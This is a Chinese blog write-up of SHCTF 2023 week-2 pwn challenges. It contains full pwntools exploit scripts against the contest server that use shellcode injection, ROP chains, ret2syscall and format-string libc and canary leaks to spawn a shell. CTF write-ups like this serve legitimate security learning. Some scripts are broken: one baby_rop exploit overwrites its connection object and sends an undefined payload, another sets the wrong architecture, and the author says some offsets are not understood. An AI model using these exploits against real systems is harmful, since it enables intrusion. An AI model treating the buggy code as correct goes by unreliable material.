SHCTF 2023 [WEEK 2] PWN

已于 2023-11-01 22:33:56 修改
阅读量513 收藏
点赞数 11
分类专栏: PWN 文章标签: 网络安全 安全 linux
于 2023-11-01 22:32:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/134146142
版权

简介:

第二周对比第一周难度提高了些,开始要熟悉做pwn的技巧手法了

easy_shellcode

查看一下保护机制,保护全关,加上又是shellcode的,栈可执行,所以可以把shellcode写入栈里

ida反汇编一下,发现可以通过buf这里泄露出栈地址(因为没有打开NX保护,栈是可执行的,要想办法把shellcode写入栈上在执行)

gdb调试下,你就会发现只需要输入0x10个字节,就可以泄露出栈地址(rbp地址),然后距离栈顶的距离为0x80,可以利用这个地址,将shellcode写入,就可以执行shell了

exp如下:

from pwn import *
context(os='linux', arch='amd64', log_level='debug') 

#p =process('./111')
p =remote('112.6.51.212',30735)

payload =b'A'*0X10

p.recvuntil(b'What\'s your name?\n')
p.send(payload)

p.recvuntil(b'A'*0x10)

stack = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x80

shellcode =asm(shellcraft.sh())
payload =shellcode.ljust(0x78,b'\x00')+ p64(stack)

p.recvuntil(b'please input your strong\n')

p.send(payload) 
p.interactive()
baby_rop

查看一下保护机制,32位程序打开了canary 和NX,并且还是静态链接

用ROPgadget --ropchain来获取rop链再缩短点,exp如下:

from pwn import *
from struct import pack
context(os='linux', arch='i386', log_level='debug') 
 
#io =process('./simplerop32')
io =remote('112.6.51.212',30779)
elf =ELF('./111')
 
# Padding goes here
p = b''
 
p += pack('<I', 0x0804993d) # pop edx ; ret
p += pack('<I', 0x080e4e80) # @ .data
p += pack('<I', 0x080aa06a) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x080537da) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0804993d) # pop edx ; ret
p += pack('<I', 0x080e4e84) # @ .data + 4
p += pack('<I', 0x080aa06a) # pop eax ; ret
p += b'/sh\x00'
p += pack('<I', 0x080537da) # mov dword ptr [edx], eax ; ret
 
p += pack('<I', 0x0804901e) # pop ebx ; ret
p += pack('<I', 0x080e4e80) # @ .data
p += pack('<I', 0x0804993f) # pop ecx ; ret
p += pack('<I', 0x080e4e88) # @ .data + 8
p += pack('<I', 0x0804993d) # pop edx ; ret
p += pack('<I', 0x080e4e88) # @ .data + 8
 
p += pack('<I', 0x080aa06a) # pop eax ; ret
p += p32(11)
p += pack('<I', 0x08049b62) # int 0x80
 
io =b'a'*0x20 + p

io.send(payload)
io.interactive()

还可以用ret2sycall的方法来解决,exp如下:

from pwn import *
from struct import pack
context(os='linux', arch='amd64', log_level='debug') 
 
#p =process('./111')
p =remote('112.6.51.212',30984)
elf =ELF('./111')
 

read =0x805CAF0
edx_ecx_ebx =0x8049941
eax =0x80aa06a
int_80 =0x8049b62
bss =0x80e5000   #整百就行

payload =b'A'*(0x1c +4) 
payload +=p32(read) 
payload +=p32(edx_ecx_ebx) +p32(0) +p32(bss) +p32(0x8) 
payload +=p32(edx_ecx_ebx) +p32(0) +p32(0) +p32(bss) 
payload +=p32(eax) +p32(11) 
payload +=p32(int_80)

p.send(payload)
p.sendline(b'/bin/sh\x00')

p.interactive()
baby_rop2

查看一下保护机制,64位程序打开canary和NX,并且还是静态链接程序,和上一次挺像的

ida反汇编一下,简简单单的一个栈溢出漏洞,唯一烦的就是该怎么构造rop执行流

一样可以用ROPgadget来构造rop执行流,唯一不好的地方就是有长度限制,需要自己删减

from pwn import *
from struct import pack
context(os='linux', arch='amd64', log_level='debug') 
 
#io =process('./111')
io =remote('112.6.51.212',30992)
elf =ELF('./111')
 
# Padding goes here
p = b''
 
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401d1d) # pop rdi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000401858) # pop rdx ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += p64(59)
p += pack('<Q', 0x0000000000401243) # syscall

payload =b'a'*0x28 + p

io.send(payload)
io.interactive()
string

查看一下保护机制,保护全关

ida反汇编一下,代码审计你会发现出现了格式字符串漏洞,并且在提示 "Input your message:" 的时候,你输入的数据会被 printf 打印出来,这个时候是不是可以把/bin/sh写进去,然后把 printf 修改成 system ,这样是不是就可以获得shell了,前提就得先泄露libc,得到system

首先,先得到程序的偏移为6,然后就是去gdb调试,找到合适的地址去泄露libc

我算到的偏移是0x29d90,不是0x24083,啊啊啊啊怎么算到的啊(有没有师傅浇浇啊T^T)

有些东西不好理解,也不知道怎么来的,其他大佬的wp,都是默认大家都知道,都不解释的,学的好累啊啊啊啊 T^T ,exp如下:

from pwn import *
context(os="linux", arch="amd64", log_level="debug")

#p = process('./pwn')
p = remote('112.6.51.212',31318)
elf = ELF('./111')
libc = ELF('./libc.so.6')
 
printf_got = elf.got['printf']

payload =b'%43$p'

p.sendlineafter(b"Input your choice:\n",b'1')
p.sendlineafter(b"Input your message:\n",payload)

libc_base =int(p.recv(14), 16) - 243 - libc.sym['__libc_start_main']   #0x24083
system = libc_base +libc.sym['system'] 

payload =fmtstr_payload(6, {printf_got: system})

p.sendlineafter(b"Input your choice:\n",b'1')
p.sendlineafter(b"Input your message:\n",payload)

p.sendlineafter(b"Input your choice:\n", b'/bin/sh\x00')
p.sendlineafter(b"Input your choice:\n", b'1')
 
p.interactive()
原始人,起动

查看一下保护机制,只打开了NX

ida反汇编,代码审计一下,有点难理清里面的逻辑-_-,有点小绕啊啊啊啊,受不了

要买些东西吗

查看一下保护机制,32位程序打开了canary和NX

ida反汇编,代码审计发现程序出现了格式字符串漏洞,再加上有canary,所以应该是通过格式字符串来泄露canary,下面看看偏移是多少

运行程序,发现偏移为7,接下来就是gdb调试,去看看canary是第几个参数(如下图,发现canary在第15个参数),并且可以通过第19个参数来泄露libc,来构造rop链

泄露libc的这个偏移还是没有算到,啊啊啊啊,有知道的师傅浇浇(球球了T^T)

exp如下:

from pwn import *
context(os="linux", arch="i386", log_level="debug")

#p = process('./111')
p = remote('112.6.51.212',31224)
elf = ELF('./111')
libc = ELF('./libc.so.6')
 
ret =0x804900e
bin_sh =0x804A03F
 
payload =b'%15$p.%19$p'

p.sendlineafter(b"Your choice:\n", b'1')
p.sendlineafter(b'and you can get a gift\n',payload)
 
canary = int(p.recv(10), 16)
p.recvuntil(b'0x')
libc_base =int(p.recv(8), 16) - 245 - libc.sym['__libc_start_main']   #0x1aee5


system =libc_base +libc.sym['system']
#bin_sh =libc_base + next(libc.search(b'/bin/sh\x00'))

payload =b'A'*0x20 +p32(canary) +p32(0) +p32(0) +p32(0) +p32(ret) +p32(system) +p32(0) +p32(bin_sh)

p.sendlineafter(b"Your choice:\n", b'2')
p.sendafter(b"and you can get the power\n",payload)
 
p.interactive()

总结:

        这周题目确实上档次了,有些东西不是很好理解,其他佬的WP也没有详细的解释,都默认是常识,弄得我云里雾里,还得多做题目,自己总结,加油加油!!!

Xzzzz911
关注
  • 11
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SHCTF 2023 [WEEK 1] PWN
Xzzzz911的博客
10-31 505
SHCTF-"山河"网络安全技能挑战赛 是由齐鲁工业大学、西安邮电大学、广东海洋大学、长春工程学院、郑州轻工业大学、河南大学、齐鲁师范学院、陕西邮电职业技术学院、陕西工业职业技术学院、商丘师范学院、咸阳师范学院 (排名不分先后)等十所高校共同举办的 CTF比赛, 完结撒花!!!这次比赛收获很大,新生赛往往会让你收获意想不到的知识点,挺好的,人民的好比赛,支持支持,明年再来 -_- ,接下来会把比赛分周分享记录下来。
[GDOUCTF 2023]Shellcode 全网最详细write up
qq_41937545的博客
11-02 564
64 位 较短的 shellcode -> 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05】​。32 位 短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80。并且没有后门没有system。
[BUUCTF]PWN——starctf_2019_babyshell(有限制的shellcode)
mcmuyanga的博客
03-23 873
starctf_2019_babyshell 例行检查,64位程序,开启了nx main函数,往buf里写入shellcode,然后程序会执行shellcod sub_400786(),这个函数会对我们输入的shellcode进行检查 检查的时候*i即可退出,可以使用\x00来绕过。 ...
shellcode基本知识(PWN
weixin_51758733的博客
07-15 834
shellcode基本知识(PWN
某大学信息安全竞赛——shellcode1 绕过strlen检查,绕过沙箱检查,执行orw shellcode拿到flag
fzucaicai的博客
05-14 1121
这是一道非常让人蛋疼的题目,之前我只听说过沙箱,但是并没有自己实际接触过沙箱这个保护机制,大概作用就是开了沙箱之后,会禁用掉某些函数,一旦我们使用了这个函数,比如我们在栈溢出构造ROP,或者写入shellcode执行时,只要含有这些函数,这个程序就会崩掉,这题目就开了沙箱。之前我有个疑问,这里明明没有exevce函数的引用,为什么我用pwntools工具写的 shellcode = asm(shellcraft.sh())或者网上抄来的execve(binsh)都不能打通呢??
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
google_pwn2own
04-10
Pwn2own大赛简介】 Pwn2own(发音为“pawn to own”)是一个年度网络安全竞赛,由Trend Micro的Zero Day Initiative(ZDI)主办。该比赛旨在揭示并解决浏览器和其他常用软件中的安全漏洞。参赛者通常会尝试利用...
火种CTF PWN easyshellcode writeup
qq_41743240的博客
04-13 843
检查一下程序保护机制 没有开启NX,也有RWX可读可写可执行的段 将程序拖入IDA 可以看到gets(&s)这里存在溢出漏洞,会将s字符复制0x64字节给buf2 利用思路: **将shellcode写到&s,再填充A覆盖只EIP填入buf2的地址 **这样执行EIP的时候即是执行buf2里面的shellcode 获取到buf2的地址 exploit如下: #coding:u...
shellcode加密过杀软
Summer's blog
05-13 1万+
第一次学习编写shellcode,大佬勿喷。
Shellcode的原理及编写
热门推荐
maotoula的专栏
01-19 6万+
1.shellcode原理
shellcode事件
weixin_41204880的博客
07-29 201
Shellcode实际是一段代码(也可以是填充数据),可以用来发送到服务器,利用已存在的特定漏洞造成溢出,通称“缓冲区溢出攻击”中植入进程的代码。这段代码可以是导致常见的恶作剧目的的弹出一个消息框弹出,也可以用来删改重要文件、窃取数据、上传木马病毒并运行,甚至是出于破坏目的的格式化硬盘等等。 shellcode就是代码,一般来说是恶意代码。劫持流程是另外一码事…通过一些漏洞劫持程序流程,然后执行攻击者想要执行的代码,那部分代码就叫shellcode。那么shellcodeshellcode只是因为很早的时
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3012
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
攻防世界PWNEasyPwn题解
seaaseesa的博客
11-15 3713
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 433
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1079
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
2023 羊城杯 pwn
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值